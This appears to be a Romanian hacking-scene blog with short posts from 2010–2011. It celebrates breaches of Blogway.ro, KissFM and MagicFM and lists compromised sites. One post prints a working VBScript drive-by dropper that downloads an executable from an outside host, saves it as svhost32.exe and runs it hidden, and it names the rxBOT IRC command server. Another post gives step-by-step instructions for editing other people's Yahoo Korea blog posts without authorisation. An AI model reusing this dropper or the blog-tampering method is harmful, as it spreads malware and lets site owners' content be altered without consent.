Blogway.ro Hacked :)

Posted February 4th, 2011. Filed under DotRO

Nemesiss surprinde mereu .
Deci dacă te găsești prin listă poate e bine să te “muți” , numai zic !

total 203372
22675827 drwxr-xr-x 332 root root 16384 Feb 3 22:45 .
22348028 drwxr-xr-x 17 root root 4096 Feb 1 09:35 ..
24019255 drwxr-xr-x 5 root root 4096 Nov 12 14:47 www.1brand.ro
22678296 drwxr-xr-x 5 root root 4096 Sep 15 02:17 www.22minutes.ro
25526517 drwxr-xr-x 5 root root 4096 Sep 15 02:29 www.3ditorial.ro
29557207 drwxr-xr-x 5 root root 4096 Sep 15 02:25 www.92lucia.ro
28279391 drwxr-xr-x 5 root root 4096 Sep 15 02:25 www.a-life-of-love.ro
23101441 drwxr-xr-x 5 root root 4096 Sep 15 02:17 www.activeads.ro
22775850 drwxr-xr-x 5 root root 4096 Sep 15 02:23 www.adinna.ro
23166997 drwxr-xr-x 5 root root 4096 Sep 15 02:17 www.adrian-ondin.ro
2326819 drwxr-xr-x 5 root root 4096 Sep 15 02:38 www.adrianabalteanu.ro
2064385 drwxr-xr-x 5 root root 4096 Sep 15 02:37 www.aleargapentruviata.ro
22679082 drwxr-xr-x 5 root root 4096 Sep 15 02:43 www.alecsonline.ro
3113245 drwxr-xr-x 5 root root 4096 Sep 15 02:43 www.alexandra-bohan.ro
2625400 drwxr-xr-x 5 root root 4096 Sep 15 02:41 www.alexandracraciun.ro
27199979 drwxr-xr-x 5 root root 4096 Sep 15 02:25 www.alexandrafodor.ro
26313252 drwxr-xr-x 5 root root 4096 Sep 15 02:19 www.alexandrudan.ro
22775796 drwxr-xr-x 5 root root 4096 Sep 15 02:19 www.alina-n.ro
23626229 drwxr-xr-x 5 root root 4096 Sep 15 02:33 www.aliniventa.ro
23070184 drwxr-xr-x 5 root root 4096 Sep 15 02:19 www.alinush-blog.ro
31228016 drwxr-xr-x 5 root root 4096 Sep 15 02:29 www.allisson.ro

Full list : http://pastebin.com/v7p3T6E6

Source : http://rstcenter.com/forum/31124-altul-blogway-ro.rst

KissFM,MagicFM hacked

Posted February 2nd, 2011. Filed under DotRO Security Stuff

D.Boy membru al forumului RSTcenter se pare că a fost ocupat.

KissFM : http://www.kissfm.ro/grinch-a-furat-site-ul/
MagicFM : http://www.magicfm.ro/find-the-grinch/

Eh , se putea și mai rău.Nu?

Java power !!

Posted June 26th, 2010. Filed under DotRO

via piticu

Romanul este “hacer”,are botnet domnule

Posted June 14th, 2010. Filed under DotRO

M-am trezit destul de repede azi , în jur de ora 5 dimineaţa deşi eram foarte obosit , în fine ,după o porţie de cireşe mâncate la geam ( era prea frumos afară ,fulgera prea ok să nu văd ) am găsit ceva şi mai interesant decât asta.

flub

Poza aparţine lui Flubber cel care a făcut acest post pe RSTcenter.com.Bun,până aici nimic ciudat ,o poză cu un comentariu şi un link însă sursa paginii respective conţine asta :

<frame src=”http://www.ramona4u.go.ro” name=”dot_tk_frame_content” scrolling=”auto” noresize>

care arată aşa :

ramona

şi conţine o bucată interesantă de VBscript  :

on error resume next
dl = “http://www.ramona4u.go.ro/vlc-codec.exe”
Set df = document.createElement(“object”)
df.setAttribute “classid”, “clsid:BD96C556-65A3-11D0-983A-00C04FC29E36″
str=”Microsoft.XMLHTTP”
Set x = df.CreateObject(str,”")
a1=”Ado”
a2=”db.”
a3=”Str”
a4=”eam”
str1=a1&a2&a3&a4
str5=str1
set S = df.createobject(str5,”")
S.type = 1
str6=”GET”
x.Open str6, dl, False
x.Send
fname1=”svhost32.exe”
set F = df.createobject(“Scripting.FileSystemObject”,”")
set tmp = F.GetSpecialFolder(2)
fname1= F.BuildPath(tmp,fname1)
S.open
S.write x.responseBody
S.savetofile fname1,2
S.close
set Q = df.createobject(“Shell.Application”,”")
Q.ShellExecute fname1,”",”",”open”,0

Se pare că pentru a “vizualiza” avem nevoie de codec :D vlc-codec.exe care defapt este asta :

http://www.virustotal.com/analisis/14d31eea019036ebb25900de024c1e720c4a17764583fcab4ff0c026ef021435-1276477571

Cum a precizat şi zYztem este vorba despre un amărât de rxBOT fără să fie crypt fără nimic.
Se pare că botnetul nostru primeşte “ordine” de aici :
irc.hyvehost.com pe canalul #mybotnet ( văd că este şi #myzombies pe acolo )

Am fost şi eu curios să vad dacă totuşi poate cineva deveni o victimă a aşa ceva din moment ce este depistat aşa de uşor de antivirus ( aproape oricare ) şi am fost surprins .

who wtf

Aruncaţi un ochi şi asupra topicului de pe #mybotnet

Mai multe despre rxBOT aici : www.cs.sjsu.edu/faculty/stamp/students/Esha_Patil_CS299Report.pdf

Ehh , este romanul “hacer” sau nu ?

Ghimpele.ro virusat

Posted June 12th, 2010. Filed under DotRO
Acum două zile am instalat windows-ul pe pc-ul “celălalt” cum zic eu, desktop-ul pe care nu l-am mai folosit aşa mult de când cu laptop-ul( aproximativ 2 ani jumate ) deci totul era praf pe acolo şi era o necesitate.
Astăzi am avut suficient timp liber sau mă uit prin documentele vechi de aici şi am găsit într-un .txt adresă : ghimpele.ro ( WTF!?). Nu mi-am adus aminte nici acum de ce am pus adresă acolo însă am dat să vizitez “celebrul” website şi surpriză :
pic2

Am căutat câte ceva despre gothguilt.ru şi am găsit asta  :

http://www.siteadvisor.com/sites/gothguilt.ru/postid?p=4693916
http://www.google.com/safebrowsing/diagnostic?site=gothguilt.ru/

La mai multi !! ( virusi )

Yahoo Blog Korea, probleme mari

Posted June 5th, 2010. Filed under DotRO

Exemplu:
[????? ?? 59] ??? ?? ??? ??? ???? – oldpine300? ??? – ??! ??? (vezi primul rand)

Nu mi-a mers pe orice blog deoarece unele cer un plugin flash pentru editor. Asta numai in IE. L-am instalat dar nu afisa corect continutul ci semne de intrebare asa ca am renuntat, sa nu stric pagina omului. Daca vad

웹에디터를 이용하기 위해서는
Microsoft Internet Explorer 를 사용하셔야 합니다.

in Mozilla – evit blogul.

Metoda:
Pentru inceput te logezi pe un cont yahoo. Apoi cauti un blog placut pe care vrei sa fii blogger . Intri pe prima pagina a blogului.
In stanga e o coloana denumita 전체 글보기 (faci copy-find)- e lista de foldere. Apesi pe un folder.
In addressbar apare http://kr.blog.yahoo.com/user/folder/3.html Inseamna ca esti in folderul 3. Pune deoparte.

Alegi o stire. Exemplu http://kr.blog.yahoo.com/user/1268.html?p=1&pm=l&tc=110&tt=1275727691 Observatie: stirea numarul 1268. Pune si asta deoparte.

Urmatorul link trebuie sa functioneze: sa vizualizezi stirea – totusi nu merge intotdeauna.

http://kr.blog.yahoo.com/user/MYBLOG/yblog.html?fid=3&pid=1268&m=lc

Pentru a edita un articol folositi:

http://kr.blog.yahoo.com/user/MYBLOG/write.html?fid=3&pid=1268&m=lc

Puteti uploada poze imediat sub boxul de text. Va lasa si cu dar e filtrat bine.

Sunt 3 butoane jos: PREVIEW SUBMIT RESET.

Have Fun!

Source : http://rstcenter.com/forum/23220-csrf-yahoo-blog-korea.rst

Powered by HaxTor | CopyWrong © 2011